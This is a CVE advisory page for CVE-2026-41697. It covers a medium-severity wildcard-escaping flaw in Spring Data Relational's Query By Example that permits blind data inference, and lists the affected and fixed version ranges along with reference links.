Home

Description

Spring Data Relational does not properly escape binding values of externally-controlled input when using StringMatcher (STARTING, ENDING, or CONTAINING) in Query By Example (QBE). An attacker can supply wildcard characters to perform boolean-based blind data inference. Affected versions: Spring Data Relational/JDBC/R2DBC 4.0.0 through 4.0.5; 3.5.0 through 3.5.11; 3.4.0 through 3.4.14; 3.3.0 through 3.3.16; 3.2.0 through 3.2.15; 3.1.0 through 3.1.14; 3.0.0 through 3.0.15; 2.4.0 through 2.4.19.

PUBLISHED Reserved 2026-04-22 | Published 2026-06-09 | Updated 2026-06-10 | Assigner vmware




MEDIUM: 4.8CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L

Problem types

CWE-943: Improper Neutralization of Special Elements in Data Query Logic

Product status

Default status
unaffected

4.0.0 (custom) before 4.0.6
affected

3.5.0 (custom) before 3.5.12
affected

3.4.0 (custom) before 3.4.15
affected

3.3.0 (custom) before 3.3.17
affected

3.2.0 (custom) before 3.2.16
affected

3.1.0 (custom) before 3.1.15
affected

3.0.0 (custom) before 3.0.16
affected

2.4.0 (custom) before 2.4.20
affected

Default status
unaffected

4.0.0 (custom) before 4.0.6
affected

3.5.0 (custom) before 3.5.12
affected

3.4.0 (custom) before 3.4.15
affected

3.3.0 (custom) before 3.3.17
affected

3.2.0 (custom) before 3.2.16
affected

3.1.0 (custom) before 3.1.15
affected

3.0.0 (custom) before 3.0.16
affected

2.4.0 (custom) before 2.4.20
affected

Default status
unaffected

4.0.0 (custom) before 4.0.6
affected

3.5.0 (custom) before 3.5.12
affected

3.4.0 (custom) before 3.4.15
affected

3.3.0 (custom) before 3.3.17
affected

3.2.0 (custom) before 3.2.16
affected

3.1.0 (custom) before 3.1.15
affected

3.0.0 (custom) before 3.0.16
affected

1.5.0 (custom) before 1.5.20
affected

References

spring.io/security/cve-2026-41697

cve.org (CVE-2026-41697)

nvd.nist.gov (CVE-2026-41697)

Download JSON